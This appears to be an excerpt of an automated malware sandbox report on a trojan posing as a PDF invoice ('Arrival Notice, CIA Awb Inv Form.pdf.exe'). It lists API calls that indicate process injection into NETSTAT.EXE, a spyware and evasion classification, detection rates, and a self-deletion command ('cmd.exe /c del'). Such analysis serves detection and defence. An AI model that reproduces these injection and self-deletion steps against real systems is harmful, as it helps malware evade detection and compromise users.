Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FC51C0	8_2_02FC51C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0306E076	8_2_0306E076
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FAF113	8_2_02FAF113
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_030770F1	8_2_030770F1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FBC6E0	8_2_02FBC6E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03076757	8_2_03076757
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FC0680	8_2_02FC0680
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FE4670	8_2_02FE4670
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FDC600	8_2_02FDC600
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0305D62C	8_2_0305D62C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0306D646	8_2_0306D646
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FC2760	8_2_02FC2760
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FCA760	8_2_02FCA760
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0307A6C0	8_2_0307A6C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_030336EC	8_2_030336EC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0307F6F6	8_2_0307F6F6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0308A526	8_2_0308A526
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FC0445	8_2_02FC0445
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_030775C6	8_2_030775C6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0307F5C9	8_2_0307F5C9
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0302D480	8_2_0302D480
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0307FB2E	8_2_0307FB2E
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FDFAA0	8_2_02FDFAA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03034BC0	8_2_03034BC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0307CA13	8_2_0307CA13
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0307EA5B	8_2_0307EA5B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0307FA89	8_2_0307FA89
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FFDB19	8_2_02FFDB19
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FC0B10	8_2_02FC0B10
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FC28C0	8_2_02FC28C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FD6882	8_2_02FD6882
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FC9870	8_2_02FC9870
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FDB870	8_2_02FDB870
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FA6868	8_2_02FA6868
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0307E9A6	8_2_0307E9A6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_030059C0	8_2_030059C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FEE810	8_2_02FEE810
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FC3800	8_2_02FC3800
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03060835	8_2_03060835
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FBE9A0	8_2_02FBE9A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03035870	8_2_03035870
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0307F872	8_2_0307F872
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_030398B2	8_2_030398B2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_030718DA	8_2_030718DA
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_030778F3	8_2_030778F3
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FB2EE8	8_2_02FB2EE8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0303FF40	8_2_0303FF40
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FC1EB2	8_2_02FC1EB2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0307FF63	8_2_0307FF63
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FE0E50	8_2_02FE0E50
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0307EFBF	8_2_0307EFBF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03071FC6	8_2_03071FC6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FC6FE0	8_2_02FC6FE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03002E48	8_2_03002E48
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03060E6D	8_2_03060E6D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03070EAD	8_2_03070EAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03079ED2	8_2_03079ED2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FCCF00	8_2_02FCCF00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FDFCE0	8_2_02FDFCE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0307FD27	8_2_0307FD27
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FD8CDF	8_2_02FD8CDF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03077D4C	8_2_03077D4C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FC3C60	8_2_02FC3C60
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FCAC20	8_2_02FCAC20
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FB0C12	8_2_02FB0C12
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0305FDF4	8_2_0305FDF4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0303EC20	8_2_0303EC20
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FC9DD0	8_2_02FC9DD0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0306EC4C	8_2_0306EC4C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FD2DB0	8_2_02FD2DB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0307EC60	8_2_0307EC60
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03076C69	8_2_03076C69
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FC0D69	8_2_02FC0D69
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03059C98	8_2_03059C98
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0308ACEB	8_2_0308ACEB
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03047CE8	8_2_03047CE8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FBAD00	8_2_02FBAD00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0281E26E	8_2_0281E26E
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0281EB52	8_2_0281EB52
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0281DE3A	8_2_0281DE3A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02809E4F	8_2_02809E4F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02809E50	8_2_02809E50
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02802FB0	8_2_02802FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02802D87	8_2_02802D87
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02802D90	8_2_02802D90

Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 02FAB910 appears 268 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 0303EF10 appears 105 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 02FF5050 appears 36 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 03007BE4 appears 96 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 0302E692 appears 86 times
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: String function: 1EA47BE4 appears 96 times
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: String function: 1EA6E692 appears 86 times
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: String function: 1E9EB910 appears 268 times
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: String function: 1EA35050 appears 36 times
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: String function: 1EA7EF10 appears 105 times

Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_02B6CC3A NtAllocateVirtualMemory,	1_2_02B6CC3A
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_02B6CF85 NtWriteVirtualMemory,	1_2_02B6CF85
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_02B72FF6 NtWriteVirtualMemory,K32GetDeviceDriverBaseNameA,	1_2_02B72FF6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_02B6C7E5 NtWriteVirtualMemory,CreateFileA,	1_2_02B6C7E5
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_02B72905 NtProtectVirtualMemory,	1_2_02B72905
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_02B70C8F NtWriteVirtualMemory,	1_2_02B70C8F
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_02B718FC NtWriteVirtualMemory,LoadLibraryA,	1_2_02B718FC
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_02B6DB02 NtWriteVirtualMemory,	1_2_02B6DB02
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32EB0 NtProtectVirtualMemory,LdrInitializeThunk,	6_2_1EA32EB0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32ED0 NtResumeThread,LdrInitializeThunk,	6_2_1EA32ED0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32E50 NtCreateSection,LdrInitializeThunk,	6_2_1EA32E50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32F00 NtCreateFile,LdrInitializeThunk,	6_2_1EA32F00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32CF0 NtDelayExecution,LdrInitializeThunk,	6_2_1EA32CF0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32C30 NtMapViewOfSection,LdrInitializeThunk,	6_2_1EA32C30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32C50 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_1EA32C50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32DA0 NtReadVirtualMemory,LdrInitializeThunk,	6_2_1EA32DA0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	6_2_1EA32DC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32D10 NtQuerySystemInformation,LdrInitializeThunk,	6_2_1EA32D10
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32B90 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_1EA32B90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32BC0 NtQueryInformationToken,LdrInitializeThunk,	6_2_1EA32BC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32B10 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_1EA32B10
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA329F0 NtReadFile,LdrInitializeThunk,	6_2_1EA329F0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32E80 NtCreateProcessEx,	6_2_1EA32E80
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32EC0 NtQuerySection,	6_2_1EA32EC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32E00 NtQueueApcThread,	6_2_1EA32E00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32FB0 NtSetValueKey,	6_2_1EA32FB0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32F30 NtOpenDirectoryObject,	6_2_1EA32F30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA33C90 NtOpenThread,	6_2_1EA33C90
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32CD0 NtEnumerateKey,	6_2_1EA32CD0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32C20 NtSetInformationFile,	6_2_1EA32C20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA33C30 NtOpenProcessToken,	6_2_1EA33C30
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32C10 NtOpenProcess,	6_2_1EA32C10
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32D50 NtWriteVirtualMemory,	6_2_1EA32D50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32AA0 NtQueryInformationFile,	6_2_1EA32AA0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32A80 NtClose,	6_2_1EA32A80
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32AC0 NtEnumerateValueKey,	6_2_1EA32AC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32A10 NtWriteFile,	6_2_1EA32A10
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32B80 NtCreateKey,	6_2_1EA32B80
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32BE0 NtQueryVirtualMemory,	6_2_1EA32BE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32B20 NtQueryInformationProcess,	6_2_1EA32B20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA32B00 NtQueryValueKey,	6_2_1EA32B00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA338D0 NtGetContextThread,	6_2_1EA338D0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA329D0 NtWaitForSingleObject,	6_2_1EA329D0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA334E0 NtCreateMutant,	6_2_1EA334E0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA34570 NtSuspendThread,	6_2_1EA34570
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA34260 NtSetContextThread,	6_2_1EA34260
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF34E0 NtCreateMutant,LdrInitializeThunk,	8_2_02FF34E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2A80 NtClose,LdrInitializeThunk,	8_2_02FF2A80
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2BC0 NtQueryInformationToken,LdrInitializeThunk,	8_2_02FF2BC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2B90 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_02FF2B90
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2B80 NtCreateKey,LdrInitializeThunk,	8_2_02FF2B80
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2B10 NtAllocateVirtualMemory,LdrInitializeThunk,	8_2_02FF2B10
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2B00 NtQueryValueKey,LdrInitializeThunk,	8_2_02FF2B00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF29F0 NtReadFile,LdrInitializeThunk,	8_2_02FF29F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2E50 NtCreateSection,LdrInitializeThunk,	8_2_02FF2E50
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2F00 NtCreateFile,LdrInitializeThunk,	8_2_02FF2F00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2CF0 NtDelayExecution,LdrInitializeThunk,	8_2_02FF2CF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2C30 NtMapViewOfSection,LdrInitializeThunk,	8_2_02FF2C30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	8_2_02FF2DC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2D10 NtQuerySystemInformation,LdrInitializeThunk,	8_2_02FF2D10
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF4260 NtSetContextThread,	8_2_02FF4260
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF4570 NtSuspendThread,	8_2_02FF4570
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2AC0 NtEnumerateValueKey,	8_2_02FF2AC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2AA0 NtQueryInformationFile,	8_2_02FF2AA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2A10 NtWriteFile,	8_2_02FF2A10
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2BE0 NtQueryVirtualMemory,	8_2_02FF2BE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2B20 NtQueryInformationProcess,	8_2_02FF2B20
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF38D0 NtGetContextThread,	8_2_02FF38D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF29D0 NtWaitForSingleObject,	8_2_02FF29D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2ED0 NtResumeThread,	8_2_02FF2ED0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2EC0 NtQuerySection,	8_2_02FF2EC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2EB0 NtProtectVirtualMemory,	8_2_02FF2EB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2E80 NtCreateProcessEx,	8_2_02FF2E80
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2E00 NtQueueApcThread,	8_2_02FF2E00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2FB0 NtSetValueKey,	8_2_02FF2FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2F30 NtOpenDirectoryObject,	8_2_02FF2F30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2CD0 NtEnumerateKey,	8_2_02FF2CD0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF3C90 NtOpenThread,	8_2_02FF3C90
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2C50 NtUnmapViewOfSection,	8_2_02FF2C50
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF3C30 NtOpenProcessToken,	8_2_02FF3C30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2C20 NtSetInformationFile,	8_2_02FF2C20
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2C10 NtOpenProcess,	8_2_02FF2C10
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2DA0 NtReadVirtualMemory,	8_2_02FF2DA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF2D50 NtWriteVirtualMemory,	8_2_02FF2D50
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0281A350 NtCreateFile,	8_2_0281A350
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0281A480 NtClose,	8_2_0281A480
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0281A400 NtReadFile,	8_2_0281A400
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0281A530 NtAllocateVirtualMemory,	8_2_0281A530
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0281A3FA NtReadFile,	8_2_0281A3FA
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0281A52A NtAllocateVirtualMemory,	8_2_0281A52A

Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22301549558.000000000042C000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameBEGRLIGHED.exe vs Arrival Notice, CIA Awb Inv Form.pdf.exe
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22815632150.00000000000D0000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenamenetstat.exej% vs Arrival Notice, CIA Awb Inv Form.pdf.exe
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000000.22296662367.000000000042C000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameBEGRLIGHED.exe vs Arrival Notice, CIA Awb Inv Form.pdf.exe
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Arrival Notice, CIA Awb Inv Form.pdf.exe
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817948839.0000000000981000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamenetstat.exej% vs Arrival Notice, CIA Awb Inv Form.pdf.exe
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22826316782.000000001E660000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamenetstat.exej% vs Arrival Notice, CIA Awb Inv Form.pdf.exe
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22830890524.000000001EC90000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Arrival Notice, CIA Awb Inv Form.pdf.exe
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe	Binary or memory string: OriginalFilenameBEGRLIGHED.exe vs Arrival Notice, CIA Awb Inv Form.pdf.exe

Source: Arrival Notice, CIA Awb Inv Form.pdf.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: edgegdi.dll	Jump to behavior

Source: Arrival Notice, CIA Awb Inv Form.pdf.exe

Static PE information: invalid certificate

Source: Arrival Notice, CIA Awb Inv Form.pdf.exe	Virustotal: Detection: 37%
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe	ReversingLabs: Detection: 31%

Source: Arrival Notice, CIA Awb Inv Form.pdf.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Process created: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Process created: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe

File created: C:\Users\user\AppData\Local\Temp\~DF37AB796C0CD232D7.TMP

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/1@23/11

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1324:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1324:120:WilError_03

